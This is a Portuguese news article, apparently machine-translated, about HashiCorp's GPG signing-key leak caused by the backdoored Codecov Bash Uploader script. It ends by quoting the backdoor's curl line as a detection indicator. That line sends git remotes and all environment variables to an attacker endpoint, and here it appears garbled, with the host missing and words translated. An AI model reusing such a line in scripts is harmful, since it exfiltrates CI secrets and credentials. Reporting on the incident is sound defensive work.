A HashiCorp, conhecida por desenvolver as ferramentas de código aberto Vagrant, Packer, Nomad e Terraform, anunciou o vazamento da chave privada GPG usada para criar assinaturas digitais que verificam os lançamentos. Os invasores que obtiveram acesso à chave GPG poderiam fazer alterações ocultas nos produtos HashiCorp, verificando-os com uma assinatura digital correta. Ao mesmo tempo, a empresa afirmou que durante a auditoria não foram identificados vestígios de tentativas de realizar tais modificações.
Atualmente, a chave GPG comprometida foi revogada e uma nova chave foi introduzida em seu lugar. O problema afetou apenas a verificação usando os arquivos SHA256SUM e SHA256SUM.sig, e não afetou a geração de assinaturas digitais para pacotes Linux DEB e RPM fornecidos através de releases.hashicorp.com, bem como mecanismos de verificação de lançamento para macOS e Windows (AuthentiCode) .
O vazamento ocorreu devido ao uso do script Codecov Bash Uploader (codecov-bash) na infraestrutura, projetado para baixar relatórios de cobertura de sistemas de integração contínua. Durante o ataque à empresa Codecov, um backdoor foi escondido no script especificado, por meio do qual senhas e chaves de criptografia foram enviadas ao servidor dos invasores.
Para hackear, os invasores aproveitaram um erro no processo de criação da imagem Codecov Docker, que permitiu extrair dados de acesso ao GCS (Google Cloud Storage), necessários para fazer alterações no script Bash Uploader distribuído a partir do codecov.io local na rede Internet. As alterações foram feitas em 31 de janeiro, permaneceram sem serem detectadas por dois meses e permitiram que invasores extraíssem informações armazenadas em ambientes de sistemas de integração contínua de clientes. Usando o código malicioso adicionado, os invasores poderiam obter informações sobre o repositório Git testado e todas as variáveis de ambiente, incluindo tokens, chaves de criptografia e senhas transmitidas a sistemas de integração contínua para organizar o acesso ao código do aplicativo, repositórios e serviços como Amazon Web Services e GitHub.
Além da chamada direta, o script Codecov Bash Uploader foi utilizado como parte de outros uploaders, como Codecov-action (Github), Codecov-circleci-orb e Codecov-bitrise-step, cujos usuários também são afetados pelo problema. Recomenda-se a todos os usuários do codecov-bash e produtos relacionados que auditem suas infraestruturas, bem como alterem senhas e chaves de criptografia. Você pode verificar a presença de um backdoor em um script pela presença da linha curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /carregar/v2 || verdadeiro
Fonte: opennet.ru